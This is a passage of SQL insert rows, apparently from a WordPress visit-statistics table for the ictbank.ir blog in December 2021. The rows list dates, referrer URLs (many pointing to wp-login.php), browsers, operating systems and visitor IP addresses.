(17195,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.101.48','000',0,1,0),
(17196,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.191.123','000',0,1,0),
(17197,'2021-12-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.129.64.148','000',0,1,0),
(17198,'2021-12-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17199,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.40.33','000',0,1,0),
(17200,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.203.166','000',0,1,0),
(17201,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.121.190','000',0,1,0),
(17202,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.239.65','000',0,1,0),
(17203,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.209.36','000',0,1,0),
(17204,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.116.127','000',0,1,0),
(17205,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.152.8','000',0,1,0),
(17206,'2021-12-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(17207,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.19.196','000',0,1,0),
(17208,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.116.179','000',0,1,0),
(17209,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.255.225','000',0,2,0),
(17210,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.24.14','000',0,2,0),
(17211,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.95.226','000',0,1,0),
(17212,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.57.115','000',0,1,0),
(17213,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.162.234','000',0,1,0),
(17214,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.24.189','000',0,1,0),
(17215,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.115.88','000',0,1,0),
(17216,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.117.120','000',0,1,0),
(17217,'2021-12-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.190.146','000',0,1,0),
(17218,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.202.84','000',0,1,0),
(17219,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.234.254','000',0,1,0),
(17220,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.45.117','000',0,1,0),
(17221,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.87.176','000',0,1,0),
(17222,'2021-12-08','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','78.31.71.247','000',0,2,0),
(17223,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.90.3','000',0,1,0),
(17224,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.226.68','000',0,1,0),
(17225,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.215.220','000',0,1,0),
(17226,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.20.235.163','000',0,1,0),
(17227,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.128.238','000',0,1,0),
(17228,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.67.230','000',0,1,0),
(17229,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.191.24','000',0,1,0),
(17230,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.105.211','000',0,1,0),
(17231,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.114.228','000',0,1,0),
(17232,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.141.143','000',0,1,0),
(17233,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.105.232','000',0,1,0),
(17234,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.127.226','000',0,1,0),
(17235,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.167.113','000',0,1,0),
(17236,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.18.28','000',0,1,0),
(17237,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.18.214.214','000',0,1,0),
(17238,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.207.37','000',0,1,0),
(17239,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.30.108','000',0,1,0),
(17240,'2021-12-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.50.185','000',0,1,0),
(17241,'2021-12-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(17242,'2021-12-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(17243,'2021-12-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(17244,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.128.133','000',0,1,0),
(17245,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.169.88','000',0,1,0),
(17246,'2021-12-08','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.34','000',0,2,0),
(17247,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.112.61','000',0,1,0),
(17248,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.163.6','000',0,1,0),
(17249,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.24.205','000',0,1,0),
(17250,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.0.64','000',0,1,0),
(17251,'2021-12-08','https://www.google.com/','Samsung Internet','Android','12',NULL,NULL,'','5.212.206.99','000',0,3,0),
(17252,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.3.154','000',0,1,0),
(17253,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.204.191','000',0,1,0),
(17254,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.148.30','000',0,1,0),
(17255,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.197.213','000',0,1,0),
(17256,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.12.111.73','000',0,1,0),
(17257,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.115.48','000',0,1,0),
(17258,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.101.115','000',0,1,0),
(17259,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.79.177','000',0,1,0),
(17260,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.237.33','000',0,1,0),
(17261,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.124.32','000',0,1,0),
(17262,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.107.206','000',0,1,0),
(17263,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.46.164','000',0,1,0),
(17264,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.135.196','000',0,1,0),
(17265,'2021-12-08','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','69.171.251.2','000',0,1,0),
(17266,'2021-12-08','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','69.171.251.17','000',0,1,0),
(17267,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.47.21','000',0,1,0),
(17268,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.83.73','000',0,1,0),
(17269,'2021-12-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.61.152.50','000',0,1,0),
(17270,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.215.178','000',0,1,0),
(17271,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.143.189','000',0,1,0),
(17272,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.161.17','000',0,1,0),
(17273,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.103.192','000',0,1,0),
(17274,'2021-12-09','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','77.68.92.164','000',0,4,0),
(17275,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.254.158','000',0,1,0),
(17276,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.118.211','000',0,1,0),
(17277,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.185.93','000',0,1,0),
(17278,'2021-12-09','https://www.google.com/','Samsung Internet','Android','12',NULL,NULL,'','46.51.60.137','000',0,12,0),
(17279,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.210.15','000',0,1,0),
(17280,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.132.13','000',0,1,0),
(17281,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.91.142','000',0,1,0),
(17282,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.124.118','000',0,1,0),
(17283,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.210.119','000',0,1,0),
(17284,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.12.164.255','000',0,1,0),
(17285,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.33.120','000',0,1,0),
(17286,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.198.164','000',0,1,0),
(17287,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.182.23','000',0,1,0),
(17288,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.146.63','000',0,1,0),
(17289,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.201.90','000',0,1,0),
(17290,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.85.61','000',0,1,0),
(17291,'2021-12-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,4,0),
(17292,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.1.41','000',0,1,0),
(17293,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.193.173','000',0,1,0),
(17294,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.153.201','000',0,1,0),
(17295,'2021-12-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.244.133.126','000',0,2,0),
(17296,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.101.11','000',0,1,0),
(17297,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.27.80','000',0,1,0),
(17298,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.128.215','000',0,1,0),
(17299,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.54.39','000',0,1,0),
(17300,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.92.27','000',0,1,0),
(17301,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.32.9','000',0,1,0),
(17302,'2021-12-09','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.153.176','000',0,1,0),
(17303,'2021-12-09','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.62.101','000',0,5,0),
(17304,'2021-12-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.223.104.57','000',0,2,0),
(17305,'2021-12-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.233','000',0,3,0),
(17306,'2021-12-09','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.66','000',0,8,0),
(17307,'2021-12-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','207.244.242.62','000',0,2,0),
(17308,'2021-12-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.231.124.193','000',0,1,0),
(17309,'2021-12-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','195.78.54.241','000',0,2,0),
(17310,'2021-12-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.175.167','000',0,2,0),
(17311,'2021-12-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(17312,'2021-12-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,2,0),
(17313,'2021-12-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','109.74.204.41','000',0,2,0),
(17314,'2021-12-09','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','85.186.5.171','000',0,1,0),
(17315,'2021-12-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.136.15','000',0,1,0),
(17316,'2021-12-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(17317,'2021-12-09','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.10.105','000',0,1,0),
(17318,'2021-12-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(17319,'2021-12-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(17320,'2021-12-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(17321,'2021-12-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(17322,'2021-12-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.233','000',0,12,0),
(17323,'2021-12-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17324,'2021-12-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.160.29.194','000',0,1,0),
(17325,'2021-12-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.12.70.90','000',0,2,0),
(17326,'2021-12-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(17327,'2021-12-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(17328,'2021-12-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.59.69','000',0,2,0),
(17329,'2021-12-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','86.55.251.169','000',0,1,0),
(17330,'2021-12-10','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','50.31.21.8','000',0,2,0),
(17331,'2021-12-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.0.232.40','000',0,1,0),
(17332,'2021-12-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(17333,'2021-12-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.65.194','000',0,1,0),
(17334,'2021-12-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.42','000',0,2,0),
(17335,'2021-12-10','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.66','000',0,8,0),
(17336,'2021-12-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(17337,'2021-12-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.60.133','000',0,1,0),
(17338,'2021-12-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(17339,'2021-12-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17340,'2021-12-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(17341,'2021-12-10','http://82.102.9.14/blog','Chrome','Android','7.0',NULL,NULL,'','221.130.37.139','000',0,1,0),
(17342,'2021-12-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.8','000',0,2,0),
(17343,'2021-12-11','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.164','000',0,1,0),
(17344,'2021-12-11','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.242.78.36','000',0,2,0),
(17345,'2021-12-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(17346,'2021-12-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','199.249.230.119','000',0,1,0),
(17347,'2021-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.159.230.89','000',0,1,0),
(17348,'2021-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.221.207','000',0,2,0),
(17349,'2021-12-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(17350,'2021-12-11','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.242.196.204','000',0,2,0),
(17351,'2021-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.128.118.130','000',0,2,0),
(17352,'2021-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.150.60','000',0,1,0),
(17353,'2021-12-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(17354,'2021-12-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,2,0),
(17355,'2021-12-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17356,'2021-12-11','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.66','000',0,8,0),
(17357,'2021-12-11','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','54.171.106.145','000',0,2,0),
(17358,'2021-12-12','http://82.102.9.14/blog','Unknown','Unknown','Unknown',NULL,NULL,'','68.183.198.36','000',0,2,0),
(17359,'2021-12-12','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','52.17.141.135','000',0,2,0),
(17360,'2021-12-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.39.208.174','000',0,1,0),
(17361,'2021-12-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(17362,'2021-12-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','157.245.129.50','000',0,2,0),
(17363,'2021-12-12','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.155.205.233','000',0,2,0),
(17364,'2021-12-12','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','63.32.71.251','000',0,2,0),
(17365,'2021-12-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,5,0),
(17366,'2021-12-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','171.97.131.28','000',0,24,0),
(17367,'2021-12-12','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.76','000',0,1,0),
(17368,'2021-12-12','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','6.3',NULL,NULL,'','178.159.37.24','000',0,8,0),
(17369,'2021-12-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(17370,'2021-12-12','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(17371,'2021-12-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.136.205.107','000',0,1,0),
(17372,'2021-12-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(17373,'2021-12-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,1,0),
(17374,'2021-12-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17375,'2021-12-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(17376,'2021-12-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.116','000',0,2,0),
(17377,'2021-12-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.250.19.242','000',0,2,0),
(17378,'2021-12-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.200.32','000',0,1,0),
(17379,'2021-12-12','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.250.73.218','000',0,2,0),
(17380,'2021-12-12','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','185.122.202.72','000',0,2,0),
(17381,'2021-12-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,9,0),
(17382,'2021-12-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.45','000',0,1,0),
(17383,'2021-12-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.118','000',0,2,0),
(17384,'2021-12-13','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.95.227.11','000',0,7,0),
(17385,'2021-12-13','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','52.210.235.247','000',0,2,0),
(17386,'2021-12-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(17387,'2021-12-13','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','52.49.191.94','000',0,2,0),
(17388,'2021-12-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.23.235.51','000',0,2,0),
(17389,'2021-12-13','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','16.163.29.33','000',0,3,0),
(17390,'2021-12-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.7','000',0,2,0),
(17391,'2021-12-13','http://design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','212.41.9.227','000',0,3,0),
(17392,'2021-12-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.57.137.208','000',0,2,0),
(17393,'2021-12-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','95.215.45.71','000',0,1,0),
(17394,'2021-12-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','93.174.95.106','000',0,2,0),
(17395,'2021-12-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','107.172.76.186','000',0,2,0),
(17396,'2021-12-13','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','185.122.202.72','000',0,2,0),
(17397,'2021-12-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.4.64','000',0,1,0),
(17398,'2021-12-13','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.66','000',0,16,0),
(17399,'2021-12-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(17400,'2021-12-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(17401,'2021-12-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(17402,'2021-12-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17403,'2021-12-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.174.159.19','000',0,3,0),
(17404,'2021-12-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.174.99.144','000',0,2,0),
(17405,'2021-12-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(17406,'2021-12-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,10,0),
(17407,'2021-12-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(17408,'2021-12-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.174.99.144','000',0,2,0),
(17409,'2021-12-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.220.1','000',0,1,0),
(17410,'2021-12-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','49.113.102.96','000',0,1,0),
(17411,'2021-12-14','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.67','000',0,4,0),
